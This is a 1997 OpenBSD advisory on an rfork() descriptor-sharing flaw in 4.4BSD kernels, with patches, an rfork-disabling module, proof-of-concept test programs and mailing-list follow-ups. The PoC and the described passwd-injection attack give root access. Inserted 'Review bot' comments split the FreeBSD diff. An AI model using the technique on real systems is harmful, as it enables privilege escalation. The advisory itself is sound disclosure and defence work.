Unfortunately, the 4.4BSD implementation of rfork() allows this to occur with processes whose credentials have been altered via SUID/SGID programs. A process can execute any SUID program on the system and gain access to its file descriptor table. This can be exploited to allow unprivileged processes to access security-critical resources, such as the password file.

----------------------------------------------------------------------------

TECHNICAL INFORMATION

The default behavior of rfork() is to share the file descriptor table between the child and parent processes. A process created with rfork() can therefore, by default, be manipulated by its parent.

An example of this problem occurs in passwd(1), an SUID program that modifies the password database. A user on the system can rfork() a process and use it to execute passwd(1). The child process will gain effective superuser credentials as a result of executing the SUID program. The parent can then wait for the temporary copy of the password database to be opened, and inject a fake entry into it using the file descriptor it now shares with passwd(1). When the password database is rebuilt, the fake entry will be committed to it and system security will be compromised.

It should be noted that this is not the only avenue of exploitation for this problem. The vulnerability allows complete control over the file descriptor tables of privileged programs; this can be exploited in a variety of ways with any SUID program. Another possible attack allows an attacker to, among other things, steal sockets from network programs; an attacker can execute an SUID networking program such as "ping", duplicate the descriptor associated with a raw socket, and close the original descriptor.
The unprivileged attacker now controls a raw socket. Additionally, an attacker can close a descriptor opened by an SUID program, and re-open it pointing elsewhere, causing the SUID program to unwittingly alter any file accessible by the attacker.

----------------------------------------------------------------------------

RESOLUTION

Provided at the end of this document is a patch from OpenBSD-current that resolves the problem in OpenBSD systems. The OpenBSD patch alters execve() to cause it not to honor the SUID or SGID bit when executing from a process that shares a file descriptor table with a different process.

Also provided is a modloadable workaround for FreeBSD. The provided module will disable the rfork() system call from a running system that supports loadable modules.

----------------------------------------------------------------------------

OPENBSD PATCH

The following patch resolves the rfork() problem in OpenBSD systems.

-- cut here --
--- kern_exec.c 1997/06/05 08:05:54 1.11
+++ kern_exec.c 1997/08/01 22:54:50 1.12
@@ -1,4 +1,4 @@
-/* $OpenBSD: kern_exec.c,v 1.11 1997/06/05 08:05:54 deraadt Exp $ */
+/* $OpenBSD: kern_exec.c,v 1.12 1997/08/01 22:54:50 deraadt Exp $ */
 /* $NetBSD: kern_exec.c,v 1.75 1996/02/09 18:59:28 christos Exp $ */
 
 /*-
@@ -124,7 +124,8 @@
 		error = EACCES;
 		goto bad1;
 	}
-	if ((vp->v_mount->mnt_flag & MNT_NOSUID) || (p->p_flag & P_TRACED))
+	if ((vp->v_mount->mnt_flag & MNT_NOSUID) ||
+	    (p->p_flag & P_TRACED) || p->p_fd->fd_refcnt > 1)
 		epp->ep_vap->va_mode &= ~(VSUID | VSGID);
 
 	/* check access. for root we have to see if any exec bit on */
-- cut here --

----------------------------------------------------------------------------

FREEBSD PATCH

The following patch is unsupported by the FreeBSD project.

-- cut here --
--- kern_exec.c Wed Apr 23 17:13:00 1997
+++ kern_exec_new.c Sat Aug 2 19:18:34 1997
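Review bot: the `p->p_fd->fd_refcnt > 1` term added in the OpenBSD hunk (@@ -124,7 +124,8 @@ of kern_exec.c) carries no comment, so a reader sees the set-id bits dropped for a third reason with only the neighbouring MNT_NOSUID and P_TRACED checks as a hint. Add a line above the `if` stating that a descriptor table shared with another process lets that process manipulate the new image's open files, and document the new rule in execve(2) and rfork(2) so that callers of rfork(RFPROC) that did not request RFFDG know their children can no longer run set-id programs. Silently dropping the bits is the safe choice; giving the new image a private copy of the table at exec time would keep those callers working and is worth noting as a possible follow-up.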
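Review bot: in the FreeBSD hunk that follows (@@ -653,7 +653,9 @@), the comment left in place above the condition, `* Disable setuid/setgid if the filesystem prohibits it or if` / `* the process is being traced.`, becomes stale, because the condition gains a third case, `|| p->p_fd->fd_refcnt > 1`; extend the comment to mention a shared descriptor table. The hunk mirrors the OpenBSD change, so the same caveat applies: an rfork(RFPROC) child that kept its parent's table loses set-id on exec without any diagnostic, and since the advisory marks this patch as unsupported by the FreeBSD project, anyone applying it should test their rfork() users before deploying a kernel built with it.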
@@ -653,7 +653,9 @@
 	 * Disable setuid/setgid if the filesystem prohibits it or if
 	 * the process is being traced.
 	 */
-	if ((vp->v_mount->mnt_flag & MNT_NOSUID) || (p->p_flag & P_TRACED))
+	if ((vp->v_mount->mnt_flag & MNT_NOSUID)
+	    || (p->p_flag & P_TRACED)
+	    || p->p_fd->fd_refcnt > 1)
 		attr->va_mode &= ~(VSUID | VSGID);
 
 	return (0);
-- cut here --

----------------------------------------------------------------------------

FREEBSD WORKAROUND

The following module, when loaded on a FreeBSD system supporting rfork(), will disable the system call as a temporary resolution to the problem.

-- cut here --
# This is a shell archive.  Save it in a file, remove anything before
# this line, and then unpack it by entering "sh file".  Note, it may
# create directories; files and directories will be owned by you and
# have default permissions.
#
# This archive contains:
#
#	Makefile
#	unrfork_mod_load.c
#
echo x - Makefile
sed 's/^X//' >Makefile << 'END-of-Makefile'
XBINDIR=	.
XSRCS=	unrfork_mod_load.c
XKMOD=	disable_rfork
XNOMAN=	none
X
XCLEANFILES+=	${KMOD}
X
X.include
END-of-Makefile
echo x - unrfork_mod_load.c
sed 's/^X//' >unrfork_mod_load.c << 'END-of-unrfork_mod_load.c'
X#define RFORK_SYSCALL_NO 251
X
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X#include
X
Xint disable_rfork(struct lkm_table *lkp, int cmd, int ver);
X
XMOD_MISC(disable_rfork);
X
Xstatic int
Xdisable_rfork_load(struct lkm_table *lkp, int cmd) {
X	struct sysent *sp = &sysent[RFORK_SYSCALL_NO];
X	int err = 0;
X
X	switch(cmd) {
X	case LKM_E_LOAD:
X		sp->sy_call = (sy_call_t *) nosys;
X
X		printf("rfork() call disabled\n");
X		break;
X
X	case LKM_E_UNLOAD:
X		sp->sy_call = (sy_call_t *) rfork;
X
X		printf("rfork() call enabled\n");
X		break;
X
X	default:
X		err = EINVAL;
X		break;
X	}
X
X	return(err);
X}
X
Xint disable_rfork(struct lkm_table *lkp, int cmd, int ver) {
X	DISPATCH(lkp, cmd, ver, disable_rfork_load,
X		 disable_rfork_load, lkm_nullcmd);
X}
END-of-unrfork_mod_load.c
exit

----------------------------------------------------------------------------

EXAMPLE CODE

The following code tests for the presence of the rfork() vulnerability on 4.4BSD systems. If, after running this program, a file is created in "/" containing the word "VULNERABLE", the system is vulnerable to the problem.

To use this test, extract the following two C programs. Compile the first ("dummy-suid") and make it SUID root, world executable. Compile and run the second in the same directory.

-- cut here (dummy-suid.c) --
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>

int main() {
	int fd;

	umask(2);

	/* open a file in the root directory; O_CREAT needs a mode argument,
	 * and the assignment needs its own parentheses so that fd receives
	 * the descriptor rather than the result of the comparison */
	if ((fd = open("/VULNERABLE", O_RDWR|O_CREAT, 0666)) < 0) {
		perror("open");
		exit(0);
	}

	/* wait for something to happen */
	for(;;);

	exit(0);
}
-- cut here (test.c) --
#include <stdlib.h>
#include <unistd.h>

int main() {
	int p;

	/* UNPRIVILEGED */

	/* create a new process that shares its parent's file
	 * descriptor table */
	if(!(p = rfork(RFPROC))) {
		/* wait for parent to open a file, write
		 * to it (11 bytes: the word plus the newline) */
		sleep(1);
		write(3, "VULNERABLE\n", 11);
		exit(0);
	}

	/* PRIVILEGED */

	/* execute 'p', an SUID program that opens a file and
	 * hangs */
	execl("./dummy-suid", "dummy-suid", NULL);
	exit(0);
}
-- cut here --

----------------------------------------------------------------------------

CREDITS

The OpenBSD development team would like to express gratitude to Danny Dulai for his discovery of this problem, to Theo de Raadt for the OpenBSD patch, and to Tim Newsham, for providing proof-of-concept code. The developers at OpenBSD would also like to thank Perry Metzger for his reliable and consistent support of their work.

OpenBSD would like to thank Crosswalk Network Security, Inc. for extensive assistance in the discovery, testing, and documentation of this vulnerability.

---
Crosswalk Network Security, Inc.
is a full service computer security consultancy, founded to address the growing need for comprehensive data protection solutions. By providing extensive security auditing, intrusion detection and response, rigid policy design, and implementation of cutting-edge encryption systems, Crosswalk ensures robust, thorough, and uncompromising protection for organizations seeking enterprise wide data security. For more information, mail info@crosswalk.com.

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzPjeZkAAAEEAL4FxOmLn0b4xbgO4VOs0q/puHP2PQQe8u+H9HBKVzdcJpNi
Rux9m9YcrVheJiI14LXsXyQjRc2gPUg2449KVJmlaftY99XsqWMv14SnXdVuwbLd
M2PyVf9dQe0fhqhRTCchXG9rGtYUPowSofBpNHmkQ8Vy0UqGAmB3uXRU3efNAAUR
tDlDcm9zc3dhbGsgTmV0d29yayBTZWN1cml0eSwgSW5jLiA8c2VjdXJpdHlAY3Jv
c3N3YWxrLmNvbT4=
=TIRq
-----END PGP PUBLIC KEY BLOCK-----

From owner-freebsd-security Sat Aug 2 20:52:00 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id UAA02429 for security-outgoing; Sat, 2 Aug 1997 20:52:00 -0700 (PDT)
Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id UAA02418 for ; Sat, 2 Aug 1997 20:51:56 -0700 (PDT)
Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.8.5/8.8.5) with UUCP id VAA11192 for freebsd-security@FreeBSD.ORG; Sat, 2 Aug 1997 21:51:55 -0600 (MDT)
Received: from localhost (marcs@localhost) by alive.znep.com (8.7.5/8.7.3) with SMTP id VAA15642 for ; Sat, 2 Aug 1997 21:53:52 -0600 (MDT)
Date: Sat, 2 Aug 1997 21:53:52 -0600 (MDT)
From: Marc Slemko
To: freebsd-security@FreeBSD.ORG
Subject: Re: Vulnerability in 4.4BSD rfork() implementation
In-Reply-To: <199708030102.UAA20008@enteract.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

On Sat, 2 Aug 1997, Thomas H. Ptacek wrote:

> ----------------------------------------------------------------------------
>
> OpenBSD Security Advisory
>
> August 2, 1997
>
> Vulnerability in rfork() System Call
>
> ----------------------------------------------------------------------------
>
> SYNOPSIS
>
> A vulnerability in certain 4.4BSD kernels allows processes to gain
> access to restricted resources by manipulating the file descriptor
> tables of SUID and SGID executables. Applications of this vulnerability
> will allow users to gain root access.
>
> ----------------------------------------------------------------------------
>
> AFFECTED SYSTEMS
>
> It is believed that all 4.4BSD operating systems implementing the
> rfork() system call are currently vulnerable to this problem. These
> operating systems include OpenBSD 2.1 and FreeBSD 3.0. The OpenBSD
> project has resolved this problem in OpenBSD-current.

Since this wasn't entirely clear on some of the FreeBSD aspects, a few comments...

First, this is a real hole. Earlier today it took me only a few minutes to make a program to add another uid 0 to your passwd file to give you root access. With the skeleton code posted in this advisory, it is even easier.

Secondly, FreeBSD 2.2 (probably any version of 2.2-current starting around 1996/02/23) and 3.0 are both vulnerable. 2.1 and earlier are not.

Third, I would recommend the use of the loadable module included in the advisory to close the hole temporarily until there is a FreeBSD advisory or patch. While the supplied patch for kern_exec looks fine, using the module is easier and saves you having to do things twice when an official patch comes out.
Few things (very few...) use rfork() so it shouldn't hurt much.

To use the loadable module, unarchive the shell archive included in the original post, type "make", then do something like:

	modload -e disable_rfork disable_rfork.o

as root. You should get a kernel message that the rfork() call is disabled. You should probably make it load at boot to prevent someone from deliberately crashing the system to remove the protection.

From owner-freebsd-security Sat Aug 2 22:07:10 1997
Return-Path:
Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id WAA04869 for security-outgoing; Sat, 2 Aug 1997 22:07:10 -0700 (PDT)
Received: from limbo.senate.org (nathan@senate.org [204.141.125.38]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id WAA04864 for ; Sat, 2 Aug 1997 22:07:06 -0700 (PDT)
Received: (from nathan@localhost) by limbo.senate.org (8.8.6/8.8.6) id BAA15769; Sun, 3 Aug 1997 01:07:27 -0400 (EDT)
From: Nathan Dorfman
Message-Id: <199708030507.BAA15769@limbo.senate.org>
Subject: Re: Vulnerability in 4.4BSD rfork() implementation
In-Reply-To: from Marc Slemko at "Aug 2, 97 09:53:52 pm"
To: marcs@znep.com (Marc Slemko)
Date: Sun, 3 Aug 1997 01:07:27 -0400 (EDT)
Cc: freebsd-security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL32 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-freebsd-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

> On Sat, 2 Aug 1997, Thomas H. Ptacek wrote:
>
> > ----------------------------------------------------------------------------
> >
> > OpenBSD Security Advisory
> >
> > August 2, 1997
> >
> > Vulnerability in rfork() System Call
> >
> > ----------------------------------------------------------------------------
> >
> > SYNOPSIS
> >
> > A vulnerability in certain 4.4BSD kernels allows processes to gain
> > access to restricted resources by manipulating the file descriptor
> > tables of SUID and SGID executables. Applications of this vulnerability
> > will allow users to gain root access.
> >
> > ----------------------------------------------------------------------------
> >
> > AFFECTED SYSTEMS
> >
> > It is believed that all 4.4BSD operating systems implementing the
> > rfork() system call are currently vulnerable to this problem. These
> > operating systems include OpenBSD 2.1 and FreeBSD 3.0. The OpenBSD
> > project has resolved this problem in OpenBSD-current.
>
> Since this wasn't entirely clear on some of the FreeBSD aspects, a few
> comments...
>
> First, this is a real hole. Earlier today it took me only a few minutes
> to make a program to add another uid 0 to your passwd file to give you
> root access. With the skeleton code posted in this advisory, it is even
> easier.
>
> Secondly, FreeBSD 2.2 (probably any version of 2.2-current starting
> around 1996/02/23) and 3.0 are both vulnerable. 2.1 and earlier are not.
I compiled and ran the two tests below on a 3.0-CURRENT system (cvsuped and compiled Tue Jul 29 21:37:02 EDT 1997). It failed to create a /VULNERABLE.